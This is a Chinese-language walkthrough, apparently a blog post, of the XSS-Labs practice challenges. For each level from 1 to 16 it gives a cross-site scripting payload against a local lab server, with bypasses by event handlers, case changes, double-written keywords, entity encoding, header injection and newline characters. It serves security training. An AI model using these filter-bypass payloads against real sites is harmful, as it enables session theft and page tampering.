XSS-LABS

level 1

http://192.168.1.136:303/level1.php?name=<script>alert(/xss/)</script>
XSS-LABS

level 2

XSS-LABS
输入:http://192.168.1.136:303/level2.php?keyword=<a href="javascript:alert(/xss/)">test</a>,发现出现">未闭合
XSS-LABS
查看源代码
XSS-LABS
重新闭合输入
http://192.168.1.136:303/level2.php?keyword="><a href="javascript:alert(/xss/)">test</a>

XSS-LABS

level 3

输入测试代码<script "' Oonn>
XSS-LABS
发现 < 和 > 都被转义,这里考虑用javascript事件实现xss
XSS-LABS
' onm ouseover='alert(/xss/)
XSS-LABS

level 4

同上
" onm ouseover="alert(/xss/)

XSS-LABS

level 5

script 和 on都被加了下划线了,这里使用a标签绕过
"><a href="javascript:alert(/xss/)">clickme!</a>

XSS-LABS

level 6

还是script和on加下划线,这次使用大小写绕过
"><Script>alert(/xss/)</Script>

XSS-LABS

level 7

script 和 on 被直接过滤,可以采用双写绕过
"><scscriptript>alert(/xss/)</scscriptript>

XSS-LABS

level 8

javascript:alert(/xss/) 进行Unicode编码&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#120;&#115;&#115;&#47;&#41;
XSS-LABS

level 9

这里验证了http:// 字段,javas&#99;ript:alert('http://')

XSS-LABS

level 10

发现源代码里面的t_sort 字段,可以进行注入
http://192.168.1.136:303/level10.php?t_sort=click here!" onm ouseover=alert(/xss/) type="text"

XSS-LABS

level 11

referer注入:click" onm ouseover=alert(/xss/) type="text"
XSS-LABS

level 12

User-Agent: 1" onfocus=alert(/xss/) type="text"
XSS-LABS

level 13-15

搭建环境原因,无法测试

level 16

script、/、空格 都被替换成 
这里考虑使用%0a替代空格
keyword=<button%0avalue="click"%0aonclick=alert('xss')>
XSS-LABS

剩下的环境不支持,加载不出来,就没有继续做了

上一篇:5277:王者荣耀


下一篇:PAT (Basic Level) Practice 1072 开学寄语 (20 分)